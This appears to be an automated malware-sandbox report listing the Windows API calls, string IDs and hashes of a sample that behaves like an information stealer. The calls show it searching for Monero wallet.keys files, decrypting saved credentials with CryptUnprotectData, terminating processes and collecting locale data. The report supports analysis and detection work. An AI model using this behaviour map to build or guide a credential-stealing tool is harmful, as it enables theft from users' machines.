                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 8cf26f2f3a655263793ea0dad8c0337875b87074fa8590789eade542735f51fe
                                        • Instruction ID: 27b22c82c0da35c609d5be7d94028331df045142c3d41d913e95371d87f4219d
                                        • Opcode Fuzzy Hash: 8cf26f2f3a655263793ea0dad8c0337875b87074fa8590789eade542735f51fe
                                        • Instruction Fuzzy Hash: 2A12EEB191015C9BCB15EB61CCA6EFE7379AF54304F4045DEA20E62091EF386B98CF69
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00500C32), ref: 004EDF5E
                                        • StrCmpCA.SHLWAPI(?,005015C0), ref: 004EDFAE
                                        • StrCmpCA.SHLWAPI(?,005015C4), ref: 004EDFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EE4E0
                                        • FindClose.KERNEL32(000000FF), ref: 004EE4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: fc39db8f968523696fe4e1a7529d444678ee82a7d4b6f293555daf55ba11b646
                                        • Instruction ID: 6663c55e8567e01812177801de20ce828c2305c1696c2d2d12273a24db3e5300
                                        • Opcode Fuzzy Hash: fc39db8f968523696fe4e1a7529d444678ee82a7d4b6f293555daf55ba11b646
                                        • Instruction Fuzzy Hash: 8FF1CCB191011C9ACB25EB61CCA5EFE7339BF54304F4045DEA20E62091EF386B99CF5A
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005015A8,00500BAF), ref: 004EDBEB
                                        • StrCmpCA.SHLWAPI(?,005015AC), ref: 004EDC33
                                        • StrCmpCA.SHLWAPI(?,005015B0), ref: 004EDC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EDECC
                                        • FindClose.KERNEL32(000000FF), ref: 004EDEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: a83661f187372ac7316175a475c9063cc0609440553edbbbc3ca115428567bb8
                                        • Instruction ID: 22e3cdc75646e4d19257149d46a1ba51fba9c13d354571e5cfb8f8c3ae8edcc1
                                        • Opcode Fuzzy Hash: a83661f187372ac7316175a475c9063cc0609440553edbbbc3ca115428567bb8
                                        • Instruction Fuzzy Hash: 679156B2E001089BCB14FB75DD56DFD733DAB84345F00865EFA0A56181EA389B1CCB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ,J>$6{$>Fq$A_{$E{$]K)}$s S}$v~W?$]=
                                        • API String ID: 0-2808568579
                                        • Opcode ID: 51fe5d8d2d6280ca8ffd31f6dbc934001e7ddab69384095bfc3a674d5366139e
                                        • Instruction ID: 5240c81a549c0f3ecd608cbe29c5f271acb9ed33f9109191e2688a976f99f289
                                        • Opcode Fuzzy Hash: 51fe5d8d2d6280ca8ffd31f6dbc934001e7ddab69384095bfc3a674d5366139e
                                        • Instruction Fuzzy Hash: 27B2E6F36082009FE304AE2DEC8567ABBE9EBD4720F1A493DE6C5C3744E63598058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #j[o$%7_$S8?$W8?$dw?$r-?]$w/=e$}h??$)"}
                                        • API String ID: 0-1978804692
                                        • Opcode ID: d330bb830353084277321b2102a7f28bc86a88a5161b40eaf64f28bb30cc3f6b
                                        • Instruction ID: ada7cb9e05f75f798ac76f213d7e4982fe6d6214e8b4cb0062f2f2b3742395e3
                                        • Opcode Fuzzy Hash: d330bb830353084277321b2102a7f28bc86a88a5161b40eaf64f28bb30cc3f6b
                                        • Instruction Fuzzy Hash: FAB226F360C204AFE304AE2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058657
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F9905
                                        • Process32First.KERNEL32(004E9FDE,00000128), ref: 004F9919
                                        • Process32Next.KERNEL32(004E9FDE,00000128), ref: 004F992E
                                        • StrCmpCA.SHLWAPI(?,004E9FDE), ref: 004F9943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F997A
                                        • CloseHandle.KERNEL32(00000000), ref: 004F9987
                                        • CloseHandle.KERNEL32(004E9FDE), ref: 004F9993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: eb69fad658730005edaa42f9fab370e2790bae1453ea7f524601f49682988ef7
                                        • Instruction ID: 1637dc52ee4593889fe4bd389f83c2f7acccf7b792697645c6ea0ed0a3bfc54a
                                        • Opcode Fuzzy Hash: eb69fad658730005edaa42f9fab370e2790bae1453ea7f524601f49682988ef7
                                        • Instruction Fuzzy Hash: AF11E27590421CABDB28DFA5DC48FEEB779BB88701F00858DF505A6240D7789A44CFA4
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,005005B7), ref: 004F7D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004F7D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 004F7D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004F7DF2
                                        • LocalFree.KERNEL32(00000000), ref: 004F7EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00500D79), ref: 004EE5A2
                                        • StrCmpCA.SHLWAPI(?,005015F0), ref: 004EE5F2
                                        • StrCmpCA.SHLWAPI(?,005015F4), ref: 004EE608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,004E4F3E,00000000,?), ref: 004EA251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA27A
                                        • LocalFree.KERNEL32(?,?,?,?,004E4F3E,00000000,?), ref: 004EA28F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: >ON
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: YF>R$YF>R$kL|~$qN{\$qi?
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: *fsy$Hk$h`7\$sKWU${
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004EC971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004EC97C
                                        • lstrcat.KERNEL32(?,00500B47), ref: 004ECA43
                                        • lstrcat.KERNEL32(?,00500B4B), ref: 004ECA57
                                        • lstrcat.KERNEL32(?,00500B4E), ref: 004ECA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004E72AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E72B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004E72E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004E7304
                                        • LocalFree.KERNEL32(?), ref: 004E730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F97AE
                                        • Process32First.KERNEL32(00500ACE,00000128), ref: 004F97C2
                                        • Process32Next.KERNEL32(00500ACE,00000128), ref: 004F97D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 004F97EC
                                        • CloseHandle.KERNEL32(00500ACE), ref: 004F980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 7066cb6124f759f2aa73d89a41dc6263851b80dd71abf25b399257aee59b7460
                                        • Instruction ID: d023ece4cd1e9ad30905201b9863bb3150bbc69d895bfb0adc547100259c1622
                                        • Opcode Fuzzy Hash: 7066cb6124f759f2aa73d89a41dc6263851b80dd71abf25b399257aee59b7460
                                        • Instruction Fuzzy Hash: C5010C75A1420CEBDB24DFA4CD44BEEB7B8BB88700F108689E50997250E7389E40CF64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: T/|@$rB$w]{Q$w]{Q$y[2
                                        • API String ID: 0-1813117950
                                        • Opcode ID: 3160efbc3830bb282d45e05536cab7b00b5ee73a69c19152f48b86c9bded5d2e
                                        • Instruction ID: 70154b8449794a4b85b6a3fad35721159cecea8b4d315a74c99677f50a54a1f2
                                        • Opcode Fuzzy Hash: 3160efbc3830bb282d45e05536cab7b00b5ee73a69c19152f48b86c9bded5d2e
                                        • Instruction Fuzzy Hash: 7682E7F360C200AFE304AE29EC8566AF7E9EFD4720F16893DE6C4D7344E63598058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction ID: ba5a3d4d7376988afd3d73c57309d63ba94c1b9f49adab621915e52968e4417c
                                        • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction Fuzzy Hash: CD63627241EBD51ECB27CB3047B619A7F26BB1321031C49CEC9C18B5F3D690AA1AE756
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,004E51D4,40000001,00000000,00000000,?,004E51D4), ref: 004F9050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: cf7d29cf102896b509aecec643232b3c28dc3eb351c0346d53643ae7791487da
                                        • Instruction ID: c9f11763c81224372005b408b711e91355a15cbe5f637fb0edefbe4854da4849
                                        • Opcode Fuzzy Hash: cf7d29cf102896b509aecec643232b3c28dc3eb351c0346d53643ae7791487da
                                        • Instruction Fuzzy Hash: BF11D270204208BFDB04CF64D884FBB33A9AB89310F108559BA198B350DB79ED41CBA9
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00500DE8,00000000,?), ref: 004F7B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00500DE8,00000000,?), ref: 004F7B54
                                        • wsprintfA.USER32 ref: 004F7B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 05bcb4415e7411e06fb29b4f4500f26ba9c5dc224e295031d9e67ffae2f17198
                                        • Instruction ID: ac45ae6e3988e3b212764104a0bbf02e2235fe9b26d727872650764d68ee14d4
                                        • Opcode Fuzzy Hash: 05bcb4415e7411e06fb29b4f4500f26ba9c5dc224e295031d9e67ffae2f17198
                                        • Instruction Fuzzy Hash: 171118B2908118AACB149BD9DD45FBEB7B8FB8CB11F10821AF605A2280D23D5940C7B4
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0145DFB0,00000000,?,00500DF8,00000000,?,00000000,00000000), ref: 004F7BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0145DFB0,00000000,?,00500DF8,00000000,?,00000000,00000000,?), ref: 004F7C0D
                                        • wsprintfA.USER32 ref: 004F7C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
